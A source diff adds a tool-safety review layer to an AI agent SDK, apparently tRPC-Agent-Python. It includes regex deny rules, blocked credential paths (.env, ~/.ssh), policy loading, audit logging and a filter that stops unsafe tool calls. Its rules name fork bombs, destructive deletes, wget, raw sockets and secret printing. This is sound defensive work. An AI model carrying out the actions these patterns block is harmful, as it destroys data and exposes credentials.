= ( + Rule( + rule_id="dangerous_delete", + decision="deny", + finding="Destructive delete operation detected.", + recommendation="Do not run destructive deletes without explicit user approval and scoped paths.", + pattern=re.compile( + r"\b(rm\s+-[^\n;&|]*[rf]|shutil\.rmtree|os\.remove|os\.unlink|Path\([^)]*\)\.unlink)", + re.IGNORECASE, + ), + ), + Rule( + rule_id="subprocess_execution", + decision="deny", + finding="Subprocess execution from Python detected.", + recommendation="Avoid spawning child processes from generated Python unless explicitly approved.", + pattern=re.compile(r"\bsubprocess\.(?:run|Popen|call|check_call|check_output)\b|\bimport\s+subprocess\b"), + ), + Rule( + rule_id="os_system_execution", + decision="deny", + finding="OS system command execution detected.", + recommendation="Avoid os.system calls unless the command is explicitly approved.", + pattern=re.compile(r"\bos\.system\s*\("), + ), + Rule( + rule_id="package_install", + decision="needs_human_review", + finding="Package installation command detected.", + recommendation="Send dependency installation through human review before mutating the environment.", + pattern=re.compile(r"\b(?:pip|pip3|python(?:3)?\s+-m\s+pip)\s+install\b", re.IGNORECASE), + ), + Rule( + rule_id="npm_install", + decision="needs_human_review", + finding="NPM package installation command detected.", + recommendation="Send npm dependency installation through human review before mutating the environment.", + pattern=re.compile(r"\bnpm\s+(?:install|i)\b", re.IGNORECASE), + ), + Rule( + rule_id="apt_install", + decision="needs_human_review", + finding="APT package installation command detected.", + recommendation="Send system package installation through human review before mutating the environment.", + pattern=re.compile(r"\b(?:apt|apt-get)\s+install\b", re.IGNORECASE), + ), + Rule( + rule_id="infinite_loop", + decision="deny", + finding="Potential unbounded loop detected.", + recommendation="Add a bounded condition, 
timeout, or cancellation path before execution.", + pattern=re.compile(r"\bwhile\s+True\s*:|\bfor\s+.*\bin\s+itertools\.count\s*\(", re.IGNORECASE), + ), + Rule( + rule_id="sensitive_output", + decision="deny", + finding="Potential sensitive information output detected.", + recommendation="Redact secrets and avoid printing environment variables or credential values.", + pattern=re.compile( + r"\bprint\s*\(\s*(?:os\.environ|.*(?:api[_-]?key|token|secret|password).*)\)|" + r"\becho\s+\$?(?:API[_-]?KEY|TOKEN|SECRET|PASSWORD)\b", + re.IGNORECASE, + ), + ), + Rule( + rule_id="wget_network", + decision="deny", + finding="Wget network command detected.", + recommendation="Use allowlisted network access only and avoid direct wget calls from generated scripts.", + pattern=re.compile(r"\bwget\b", re.IGNORECASE), + ), + Rule( + rule_id="aiohttp_network", + decision="deny", + finding="aiohttp network client usage detected.", + recommendation="Use allowlisted network access only and avoid direct aiohttp clients from generated scripts.", + pattern=re.compile(r"\baiohttp\.ClientSession\b|\bimport\s+aiohttp\b|\bfrom\s+aiohttp\s+import\b"), + ), + Rule( + rule_id="socket_network", + decision="deny", + finding="Socket network usage detected.", + recommendation="Avoid raw socket access from generated scripts unless explicitly approved.", + pattern=re.compile(r"\bsocket\.socket\s*\(|\bimport\s+socket\b|\bfrom\s+socket\s+import\b"), + ), + Rule( + rule_id="fork_bomb", + decision="deny", + finding="Fork bomb pattern detected.", + recommendation="Do not execute fork bombs or commands that recursively spawn processes.", + pattern=re.compile(r":\(\)\s*\{.*\};\s*:", re.DOTALL), + ), + Rule( + rule_id="bash_pipe", + decision="needs_human_review", + finding="Bash pipeline detected.", + recommendation="Review piped shell commands because pipes can hide data flow between commands.", + pattern=re.compile(r"(?]+", re.IGNORECASE) + + +class SafetyReviewer: + """Evaluate generated actions against 
deterministic safety rules.""" + + def __init__( + self, + allowed_domains: Iterable[str] | None = None, + *, + policy: ToolSafetyPolicy | None = None, + policy_path: str | None = None, + ) -> None: + base_policy = policy if policy is not None else load_tool_safety_policy(policy_path) + if allowed_domains is not None: + base_policy = base_policy.with_allowed_domains(_normalize_host(domain) for domain in allowed_domains) + self.policy = base_policy + + def review(self, text: str, *, action_type: str = "python", tool_name: str = "") -> SafetyReview: + """Return a structured decision for *text*.""" + started_at = time.perf_counter() + source = text or "" + network_review: SafetyReview | None = None + urls = _extract_urls(source) + if urls: + network_review = self._review_network(source, urls, action_type, tool_name, started_at) + if network_review is not None and network_review.decision != "allow": + return network_review + + path_review = self._review_blocked_paths(source, action_type, tool_name, started_at) + if path_review is not None: + return path_review + + for rule in _RULES: + match = rule.pattern.search(source) + if match: + evidence, desensitized = _redact_evidence(match.group(0)) + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision=rule.decision, + rule_id=rule.rule_id, + finding=rule.finding, + risk_level=self.policy.risk_level_for(rule.rule_id), + recommendation=rule.recommendation, + evidence=evidence, + desensitized=desensitized, + started_at=started_at, + ) + + if network_review is not None: + return network_review + + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision="allow", + rule_id="safe_python", + finding="No risky code or command patterns detected.", + risk_level=self.policy.risk_level_for("safe_python"), + recommendation="Proceed with normal execution.", + evidence="", + desensitized=False, + started_at=started_at, + ) + + def 
_review_network( + self, + source: str, + urls: list[str], + action_type: str, + tool_name: str, + started_at: float, + ) -> SafetyReview | None: + disallowed_hosts = [ + _normalize_host(urlparse(url).hostname or "") for url in urls + if not _host_allowed(_normalize_host(urlparse(url).hostname or ""), self.policy.allowed_domains) + ] + if disallowed_hosts: + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision="deny", + rule_id="network_not_allowlisted", + finding="Network request targets a non-allowlisted domain.", + risk_level=self.policy.risk_level_for("network_not_allowlisted"), + recommendation="Only request domains that are explicitly allowlisted.", + evidence=disallowed_hosts[0], + desensitized=False, + started_at=started_at, + ) + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision="allow", + rule_id="network_allowlist", + finding="Network request targets an allowlisted domain.", + risk_level=self.policy.risk_level_for("network_allowlist"), + recommendation="Proceed with the allowlisted network request.", + evidence=_normalize_host(urlparse(urls[0]).hostname or ""), + desensitized=False, + started_at=started_at, + ) + + def _review_blocked_paths( + self, + source: str, + action_type: str, + tool_name: str, + started_at: float, + ) -> SafetyReview | None: + for rule_id, (finding, recommendation, decision) in _PATH_RULES.items(): + for blocked_path in self.policy.blocked_paths_for(rule_id): + if blocked_path and blocked_path in source: + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision=decision, + rule_id=rule_id, + finding=finding, + risk_level=self.policy.risk_level_for(rule_id), + recommendation=recommendation, + evidence=blocked_path, + desensitized=False, + started_at=started_at, + ) + return None + + def _build_review( + self, + *, + source: str, + action_type: str, + tool_name: str, + decision: 
str, + rule_id: str, + finding: str, + risk_level: str, + recommendation: str, + evidence: str, + desensitized: bool, + started_at: float, + ) -> SafetyReview: + source_hash = hashlib.sha256(source.encode("utf-8")).hexdigest() + blocked = decision in {"deny", "needs_human_review"} + latency = time.perf_counter() - started_at + rules_evaluated = ["safe_python", "network_allowlist", "network_not_allowlisted"] + rules_evaluated.extend(_PATH_RULES) + rules_evaluated.extend(rule.rule_id for rule in _RULES) + report = { + "decision": decision, + "rule_id": rule_id, + "finding": finding, + "risk_level": risk_level, + "tool_name": tool_name, + "blocked": blocked, + "latency": latency, + "desensitized": desensitized, + "recommendation": recommendation, + "evidence": evidence, + } + audit = { + "decision": decision, + "rule_id": rule_id, + "risk_level": risk_level, + "tool_name": tool_name, + "blocked": blocked, + "latency": latency, + "desensitized": desensitized, + "action_type": action_type, + "input_sha256": source_hash, + "allowed_domains": list(self.policy.allowed_domains), + "rules_evaluated": rules_evaluated, + } + return SafetyReview( + decision=decision, + rule_id=rule_id, + finding=finding, + report=report, + audit=audit, + ) + + +def _extract_urls(text: str) -> list[str]: + return [match.group(0).rstrip(").,;") for match in _URL_RE.finditer(text)] + + +def _host_allowed(host: str, allowed_domains: tuple[str, ...]) -> bool: + if not host or not allowed_domains: + return False + return any(host == allowed or host.endswith(f".{allowed}") for allowed in allowed_domains) + + +def _normalize_host(host: str) -> str: + host = host.strip().lower() + if "://" in host: + host = urlparse(host).hostname or "" + if host.startswith("www."): + host = host[4:] + return host.rstrip(".") + + +def _redact_evidence(value: str) -> tuple[str, bool]: + redacted = re.sub( + r"(?i)(api[_-]?key|token|secret|password)\s*=\s*['\"]?[^'\"\s)]+", + r"\1=", + value, + ) + return redacted[:120], 
redacted != value + + +SafetyChecker = SafetyReviewer diff --git a/trpc_agent_sdk/_tool_safety_policy.py b/trpc_agent_sdk/_tool_safety_policy.py new file mode 100644 index 00000000..5e3759ce --- /dev/null +++ b/trpc_agent_sdk/_tool_safety_policy.py @@ -0,0 +1,196 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Policy configuration for tool safety review.""" + +from __future__ import annotations + +from dataclasses import dataclass +from dataclasses import replace +from pathlib import Path +from typing import Iterable +from typing import Mapping + +import yaml + + +class SafetyPolicyError(ValueError): + """Raised when a tool safety policy file is invalid.""" + + +_DEFAULT_ALLOWED_DOMAINS: tuple[str, ...] = () +_DEFAULT_BLOCKED_PATHS: dict[str, tuple[str, ...]] = { + "read_dotenv": (".env", ), + "read_ssh": ("~/.ssh", ".ssh/"), +} +_DEFAULT_ALLOWED_COMMANDS: tuple[str, ...] = () +_DEFAULT_MAX_TIMEOUT = 60 +_DEFAULT_MAX_OUTPUT_SIZE = 10_000 +_DEFAULT_RISK_LEVELS: dict[str, str] = { + "safe_python": "none", + "dangerous_delete": "critical", + "read_dotenv": "high", + "read_ssh": "critical", + "subprocess_execution": "high", + "os_system_execution": "high", + "package_install": "medium", + "npm_install": "medium", + "apt_install": "medium", + "infinite_loop": "high", + "sensitive_output": "high", + "wget_network": "high", + "aiohttp_network": "high", + "socket_network": "high", + "fork_bomb": "critical", + "bash_pipe": "medium", + "shell_injection": "medium", + "excessive_concurrency": "high", + "large_file_write": "high", + "human_review_required": "medium", + "network_allowlist": "none", + "network_not_allowlisted": "high", +} + + +@dataclass(frozen=True) +class ToolSafetyPolicy: + """Configuration used by the tool safety reviewer.""" + + allowed_domains: tuple[str, ...] 
= _DEFAULT_ALLOWED_DOMAINS + blocked_paths: Mapping[str, tuple[str, ...]] | None = None + allowed_commands: tuple[str, ...] = _DEFAULT_ALLOWED_COMMANDS + max_timeout: int = _DEFAULT_MAX_TIMEOUT + max_output_size: int = _DEFAULT_MAX_OUTPUT_SIZE + risk_levels: Mapping[str, str] | None = None + + def __post_init__(self) -> None: + object.__setattr__(self, "allowed_domains", + tuple(sorted(_coerce_string_tuple( + self.allowed_domains, + "allowed_domains", + )))) + blocked_paths = self.blocked_paths if self.blocked_paths is not None else _DEFAULT_BLOCKED_PATHS + object.__setattr__(self, "blocked_paths", _coerce_blocked_paths(blocked_paths)) + object.__setattr__(self, "allowed_commands", + tuple(sorted(_coerce_string_tuple( + self.allowed_commands, + "allowed_commands", + )))) + object.__setattr__(self, "max_timeout", _coerce_positive_int(self.max_timeout, "max_timeout")) + object.__setattr__(self, "max_output_size", _coerce_positive_int( + self.max_output_size, + "max_output_size", + )) + risk_levels = dict(_DEFAULT_RISK_LEVELS) + if self.risk_levels is not None: + risk_levels.update(_coerce_string_mapping(self.risk_levels, "risk_levels")) + object.__setattr__(self, "risk_levels", risk_levels) + + @classmethod + def default(cls) -> "ToolSafetyPolicy": + """Return the default safety policy.""" + return cls() + + def with_allowed_domains(self, domains: Iterable[str]) -> "ToolSafetyPolicy": + """Return a copy with a different domain allowlist.""" + return replace(self, allowed_domains=tuple(domains)) + + def risk_level_for(self, rule_id: str) -> str: + """Return configured risk level for *rule_id*.""" + return self.risk_levels.get(rule_id, "medium") # type: ignore[union-attr] + + def blocked_paths_for(self, rule_id: str) -> tuple[str, ...]: + """Return configured blocked path fragments for *rule_id*.""" + return self.blocked_paths.get(rule_id, ()) # type: ignore[union-attr] + + +def load_tool_safety_policy(path: str | Path | None = None) -> ToolSafetyPolicy: + """Load a 
tool safety policy from YAML, or return defaults.""" + if path is None: + return ToolSafetyPolicy.default() + + policy_path = Path(path) + if not policy_path.exists(): + return ToolSafetyPolicy.default() + + try: + raw = yaml.safe_load(policy_path.read_text(encoding="utf-8")) + except yaml.YAMLError as exc: + raise SafetyPolicyError(f"Invalid tool safety policy YAML: {exc}") from exc + except OSError as exc: + raise SafetyPolicyError(f"Unable to read tool safety policy {policy_path}: {exc}") from exc + + if raw is None: + return ToolSafetyPolicy.default() + if not isinstance(raw, dict): + raise SafetyPolicyError("Invalid tool safety policy: top-level YAML value must be a mapping") + + allowed_keys = { + "allowed_domains", + "blocked_paths", + "allowed_commands", + "max_timeout", + "max_output_size", + "risk_levels", + } + unknown = sorted(set(raw) - allowed_keys) + if unknown: + raise SafetyPolicyError(f"Invalid tool safety policy: unknown field(s): {', '.join(unknown)}") + + defaults = ToolSafetyPolicy.default() + return ToolSafetyPolicy( + allowed_domains=raw.get("allowed_domains", defaults.allowed_domains), + blocked_paths=raw.get("blocked_paths", defaults.blocked_paths), + allowed_commands=raw.get("allowed_commands", defaults.allowed_commands), + max_timeout=raw.get("max_timeout", defaults.max_timeout), + max_output_size=raw.get("max_output_size", defaults.max_output_size), + risk_levels=raw.get("risk_levels", defaults.risk_levels), + ) + + +def _coerce_string_tuple(value: object, field_name: str) -> tuple[str, ...]: + if value is None: + return () + if not isinstance(value, (list, tuple, set)): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must be a list of strings") + result = [] + for item in value: + if not isinstance(item, str): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must contain only strings") + cleaned = item.strip() + if cleaned: + result.append(cleaned) + return tuple(result) + + +def 
_coerce_blocked_paths(value: object) -> dict[str, tuple[str, ...]]: + if isinstance(value, (list, tuple, set)): + return {"read_dotenv": _coerce_string_tuple(value, "blocked_paths")} + if not isinstance(value, Mapping): + raise SafetyPolicyError("Invalid tool safety policy: blocked_paths must be a mapping or list of strings") + + result: dict[str, tuple[str, ...]] = {} + for rule_id, paths in value.items(): + if not isinstance(rule_id, str): + raise SafetyPolicyError("Invalid tool safety policy: blocked_paths keys must be strings") + result[rule_id] = _coerce_string_tuple(paths, f"blocked_paths.{rule_id}") + return result + + +def _coerce_string_mapping(value: object, field_name: str) -> dict[str, str]: + if not isinstance(value, Mapping): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must be a mapping") + result: dict[str, str] = {} + for key, item in value.items(): + if not isinstance(key, str) or not isinstance(item, str): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} keys and values must be strings") + result[key] = item + return result + + +def _coerce_positive_int(value: object, field_name: str) -> int: + if not isinstance(value, int) or isinstance(value, bool) or value <= 0: + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must be a positive integer") + return value diff --git a/trpc_agent_sdk/_tool_safety_telemetry.py b/trpc_agent_sdk/_tool_safety_telemetry.py new file mode 100644 index 00000000..d936680f --- /dev/null +++ b/trpc_agent_sdk/_tool_safety_telemetry.py @@ -0,0 +1,40 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""Telemetry helpers for tool safety review results.""" + +from __future__ import annotations + +from typing import Any + +from trpc_agent_sdk._tool_safety import SafetyReview + +try: + from opentelemetry import trace +except Exception: # pylint: disable=broad-except + trace = None # type: ignore[assignment] + + +def trace_tool_safety_review(review: SafetyReview) -> None: + """Write tool safety review attributes to the current span. + + This helper is intentionally best-effort: safety decisions must not depend + on telemetry availability or exporter configuration. + """ + try: + if trace is None: + return + span = trace.get_current_span() + span.set_attribute("tool.safety.decision", _attribute_value(review.decision)) + span.set_attribute("tool.safety.risk_level", _attribute_value(review.report.get("risk_level", ""))) + span.set_attribute("tool.safety.rule_id", _attribute_value(review.rule_id)) + except Exception: # pylint: disable=broad-except + return + + +def _attribute_value(value: Any) -> str: + if isinstance(value, (list, tuple, set, frozenset)): + return ",".join(str(item) for item in value) + return str(value) diff --git a/trpc_agent_sdk/server/openclaw/__init__.py b/trpc_agent_sdk/server/openclaw/__init__.py index bc6e483f..59e5aaab 100644 --- a/trpc_agent_sdk/server/openclaw/__init__.py +++ b/trpc_agent_sdk/server/openclaw/__init__.py @@ -3,3 +3,13 @@ # Copyright (C) 2026 Tencent. All rights reserved. # # tRPC-Agent-Python is licensed under Apache-2.0. 
+ +from ._safety_review import SafetyChecker +from ._safety_review import SafetyReview +from ._safety_review import SafetyReviewer + +__all__ = [ + "SafetyChecker", + "SafetyReview", + "SafetyReviewer", +] diff --git a/trpc_agent_sdk/server/openclaw/_safety_review.py b/trpc_agent_sdk/server/openclaw/_safety_review.py new file mode 100644 index 00000000..5897563f --- /dev/null +++ b/trpc_agent_sdk/server/openclaw/_safety_review.py @@ -0,0 +1,18 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Compatibility exports for OpenClaw safety review.""" + +from trpc_agent_sdk._tool_safety import SafetyChecker +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety import Rule + +__all__ = [ + "Rule", + "SafetyChecker", + "SafetyReview", + "SafetyReviewer", +] diff --git a/trpc_agent_sdk/tools/__init__.py b/trpc_agent_sdk/tools/__init__.py index 3efb355b..a5762d56 100644 --- a/trpc_agent_sdk/tools/__init__.py +++ b/trpc_agent_sdk/tools/__init__.py @@ -81,6 +81,14 @@ from .mcp_tool import StdioConnectionParams from .mcp_tool import StreamableHTTPConnectionParams from .mcp_tool import patch_mcp_cancel_scope_exit_issue +from .safety import SafetyChecker +from .safety import Rule +from .safety import SafetyPolicyError +from .safety import SafetyReview +from .safety import SafetyReviewer +from .safety import ToolSafetyFilter +from .safety import ToolSafetyPolicy +from .safety import load_tool_safety_policy from .utils import build_function_declaration from .utils import from_function_with_options from .utils import get_required_fields @@ -163,6 +171,14 @@ "StdioConnectionParams", "StreamableHTTPConnectionParams", "patch_mcp_cancel_scope_exit_issue", + "Rule", + "SafetyChecker", + "SafetyPolicyError", + "SafetyReview", + 
"SafetyReviewer", + "ToolSafetyFilter", + "ToolSafetyPolicy", + "load_tool_safety_policy", "build_function_declaration", "from_function_with_options", "get_required_fields", diff --git a/trpc_agent_sdk/tools/safety/__init__.py b/trpc_agent_sdk/tools/safety/__init__.py new file mode 100644 index 00000000..11675b8f --- /dev/null +++ b/trpc_agent_sdk/tools/safety/__init__.py @@ -0,0 +1,116 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool script safety guard framework.""" + +from .audit import DEFAULT_AUDIT_LOG_FILE +from .audit import SafetyAuditLogger +from .audit import build_audit_record +from .audit import risk_level +from .bash_scanner import AptInstallRule +from .bash_scanner import BackgroundExecutionRule +from .bash_scanner import BashScanner +from .bash_scanner import CurlRule +from .bash_scanner import ForkBombRule +from .bash_scanner import LongSleepRule +from .bash_scanner import NpmInstallRule +from .bash_scanner import PipInstallRule +from .bash_scanner import RmRfRule +from .bash_scanner import ShellPipeRule +from .bash_scanner import SudoRule +from .bash_scanner import WgetRule +from .bash_scanner import create_bash_rules +from .checker import Rule as ScannerRule +from .checker import SafetyChecker as ScriptSafetyChecker +from .decision import DecisionEngine +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest +from .policy import DEFAULT_POLICY_FILE +from .policy import PolicyLoader +from .policy import SAFETY_POLICY_ENV +from .policy import SafetyPolicy +from .python_scanner import EnvFileReadRule +from .python_scanner import OsSystemRule +from .python_scanner import PythonScanner +from .python_scanner import RequestsGetPostRule +from .python_scanner import 
ShutilRmtreeRule +from .python_scanner import SocketConnectRule +from .python_scanner import SshPathReadRule +from .python_scanner import SubprocessPopenRule +from .python_scanner import SubprocessRunRule +from .python_scanner import create_python_rules +from .report import DEFAULT_REPORT_FILE +from .report import SafetyReportWriter +from .report import build_report +from .telemetry import record_safety_attributes +from .wrapper import SafetyExecutionWrapper +from .wrapper import SafetyViolationError +from ._filter import ToolSafetyFilter +from trpc_agent_sdk._tool_safety import Rule +from trpc_agent_sdk._tool_safety import SafetyChecker +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import SafetyPolicyError +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_policy import load_tool_safety_policy + +__all__ = [ + "DEFAULT_AUDIT_LOG_FILE", + "SafetyAuditLogger", + "build_audit_record", + "risk_level", + "AptInstallRule", + "BackgroundExecutionRule", + "BashScanner", + "CurlRule", + "ForkBombRule", + "LongSleepRule", + "NpmInstallRule", + "PipInstallRule", + "RmRfRule", + "ShellPipeRule", + "SudoRule", + "WgetRule", + "create_bash_rules", + "Rule", + "ScannerRule", + "SafetyChecker", + "ScriptSafetyChecker", + "SafetyReview", + "SafetyReviewer", + "DecisionEngine", + "ToolSafetyFilter", + "SafetyPolicyError", + "ToolSafetyPolicy", + "load_tool_safety_policy", + "Finding", + "SafetyDecision", + "SafetyResult", + "SafetySeverity", + "ToolExecutionRequest", + "DEFAULT_POLICY_FILE", + "PolicyLoader", + "SAFETY_POLICY_ENV", + "SafetyPolicy", + "EnvFileReadRule", + "OsSystemRule", + "PythonScanner", + "RequestsGetPostRule", + "ShutilRmtreeRule", + "SocketConnectRule", + "SshPathReadRule", + "SubprocessPopenRule", + "SubprocessRunRule", + "create_python_rules", + "DEFAULT_REPORT_FILE", + "SafetyReportWriter", + 
"build_report", + "record_safety_attributes", + "SafetyExecutionWrapper", + "SafetyViolationError", +] diff --git a/trpc_agent_sdk/tools/safety/_filter.py b/trpc_agent_sdk/tools/safety/_filter.py new file mode 100644 index 00000000..6151bed3 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_filter.py @@ -0,0 +1,117 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool filter integration for reusable safety review.""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any +from typing import Iterable +from typing import Mapping +from typing import Sequence +from typing_extensions import override + +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_telemetry import trace_tool_safety_review +from trpc_agent_sdk.context import AgentContext +from trpc_agent_sdk.filter import BaseFilter +from trpc_agent_sdk.filter import FilterResult +from trpc_agent_sdk.filter import FilterType +from trpc_agent_sdk.filter import register_tool_filter +from trpc_agent_sdk.tools._context_var import get_tool_var + +_DEFAULT_BLOCK_DECISIONS = ("deny", "needs_human_review") + + +@register_tool_filter("tool_safety") +class ToolSafetyFilter(BaseFilter): + """Block unsafe tool invocations before the tool implementation runs. + + The filter reviews the serialized tool arguments with :class:`SafetyReviewer`. + Reviews whose decision is in ``block_decisions`` return a structured tool error + response and stop the filter chain without raising an exception. 
+ """ + + def __init__( + self, + *, + reviewer: SafetyReviewer | None = None, + allowed_domains: Iterable[str] | None = None, + policy: ToolSafetyPolicy | None = None, + policy_path: str | None = None, + block_decisions: Sequence[str] = _DEFAULT_BLOCK_DECISIONS, + action_type: str | None = None, + ) -> None: + super().__init__() + self._type = FilterType.TOOL + self._name = "tool_safety" + if reviewer is not None and (allowed_domains is not None or policy is not None or policy_path is not None): + raise ValueError("reviewer cannot be combined with allowed_domains, policy, or policy_path") + self._reviewer = reviewer or SafetyReviewer( + allowed_domains=allowed_domains, + policy=policy, + policy_path=policy_path, + ) + self._block_decisions = frozenset(block_decisions) + self._action_type = action_type + + @override + async def _before(self, ctx: AgentContext, req: Any, rsp: FilterResult) -> None: + """Review the tool invocation before executing the tool.""" + del ctx + tool = get_tool_var() + tool_name = getattr(tool, "name", "") if tool is not None else "" + action_type = self._action_type or _infer_action_type(tool_name, req) + review = self._reviewer.review( + _serialize_tool_request(req), + action_type=action_type, + tool_name=tool_name, + ) + trace_tool_safety_review(review) + if review.decision not in self._block_decisions: + return + + rsp.rsp = _blocked_tool_response(review) + rsp.error = None + rsp.is_continue = False + + +def _infer_action_type(tool_name: str, req: Any) -> str: + normalized_name = tool_name.lower() + if normalized_name in {"bash", "shell"}: + return "bash" + if isinstance(req, Mapping) and isinstance(req.get("command"), str): + return "bash" + return "tool" + + +def _serialize_tool_request(req: Any) -> str: + if isinstance(req, str): + return req + try: + return json.dumps(req, ensure_ascii=False, sort_keys=True, default=_json_default) + except (TypeError, ValueError): + return str(req) + + +def _json_default(value: Any) -> Any: + if 
hasattr(value, "model_dump"): + return value.model_dump(mode="json") + if isinstance(value, Path): + return str(value) + return str(value) + + +def _blocked_tool_response(review: SafetyReview) -> dict[str, Any]: + return { + "success": False, + "error": f"TOOL_SAFETY_BLOCKED: {review.finding}", + "safety": review.report, + "safety_audit": review.audit, + } diff --git a/trpc_agent_sdk/tools/safety/_reviewer.py b/trpc_agent_sdk/tools/safety/_reviewer.py new file mode 100644 index 00000000..3207d373 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_reviewer.py @@ -0,0 +1,18 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Compatibility exports for the reusable safety reviewer.""" + +from trpc_agent_sdk._tool_safety import SafetyChecker +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety import Rule + +__all__ = [ + "Rule", + "SafetyChecker", + "SafetyReview", + "SafetyReviewer", +] diff --git a/trpc_agent_sdk/tools/safety/audit.py b/trpc_agent_sdk/tools/safety/audit.py new file mode 100644 index 00000000..b9b0d3c7 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/audit.py @@ -0,0 +1,163 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""JSONL audit logging for tool safety checks.""" + +from __future__ import annotations + +import json +import time +from datetime import datetime +from datetime import timezone +from pathlib import Path +from typing import Any +from typing import Optional + +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest + +DEFAULT_AUDIT_LOG_FILE = Path("tool_safety_audit.jsonl") +_SENSITIVE_KEYS = {"api_key", "authorization", "cookie", "password", "secret", "token"} +_SCRIPT_KEYS = {"bash_code", "cmd", "code", "command", "python_code", "script"} +_SEVERITY_RANK = { + SafetySeverity.INFO: 0, + SafetySeverity.LOW: 1, + SafetySeverity.MEDIUM: 2, + SafetySeverity.HIGH: 3, + SafetySeverity.CRITICAL: 4, +} + + +class SafetyAuditLogger: + """Append tool safety audit events as JSON Lines.""" + + def __init__(self, path: str | Path = DEFAULT_AUDIT_LOG_FILE): + self._path = Path(path) + + @property + def path(self) -> Path: + """Return the audit log path.""" + return self._path + + def write(self, result: SafetyResult, latency_ms: float) -> None: + """Write one audit record.""" + record = build_audit_record(result, latency_ms) + with self._path.open("a", encoding="utf-8") as fp: + fp.write(json.dumps(record, ensure_ascii=False, sort_keys=True)) + fp.write("\n") + + +def build_audit_record(result: SafetyResult, latency_ms: float) -> dict[str, Any]: + """Build one ELK/Grafana-friendly audit record.""" + request = result.request or ToolExecutionRequest() + current_risk_level = risk_level(result.findings) + rule_ids = [finding.rule_id for finding in result.findings] + return { + "timestamp": _utc_now(), + "tool_name": request.tool_name, + "decision": result.decision.value, + "risk_level": current_risk_level.value, + "rule_id": ",".join(rule_ids), + "rule_ids": rule_ids, + "latency": round(latency_ms, 3), + "latency_ms": round(latency_ms, 3), + "blocked": 
result.decision != SafetyDecision.ALLOW, + "desensitized": True, + "agent_name": request.agent_name, + "invocation_id": request.invocation_id, + "function_call_id": request.function_call_id, + "language": request.language, + "finding_count": len(result.findings), + "findings": [_finding_record(finding) for finding in result.findings], + "request": _request_record(request), + } + + +def risk_level(findings: list[Finding]) -> SafetySeverity: + """Return the highest severity represented by a list of findings.""" + if not findings: + return SafetySeverity.LOW + return max((finding.severity for finding in findings), key=lambda severity: _SEVERITY_RANK[severity]) + + +def _finding_record(finding: Finding) -> dict[str, Any]: + return { + "rule_id": finding.rule_id, + "severity": finding.severity.value, + "target": _desensitize_value(finding.target), + "message": finding.message, + "metadata": _desensitize_value(finding.metadata), + } + + +def _request_record(request: ToolExecutionRequest) -> dict[str, Any]: + return { + "args": _desensitize_args(request.args), + "metadata": _desensitize_value(request.metadata), + "script_present": bool(request.script), + "script_length": len(request.script or ""), + } + + +def _desensitize_args(args: dict[str, Any]) -> dict[str, Any]: + return {str(key): _desensitize_arg_value(str(key), value) for key, value in args.items()} + + +def _desensitize_arg_value(key: str, value: Any) -> Any: + lowered_key = key.lower() + if lowered_key in _SCRIPT_KEYS: + return _desensitize_script_value(value) + if _is_sensitive_key(lowered_key): + return "***" + return _desensitize_value(value) + + +def _desensitize_script_value(value: Any) -> dict[str, Any]: + text = value if isinstance(value, str) else "" + return { + "redacted": True, + "length": len(text), + } + + +def _desensitize_value(value: Any) -> Any: + if isinstance(value, dict): + return { + str(key): "***" if _is_sensitive_key(str(key)) else _desensitize_value(item) + for key, item in 
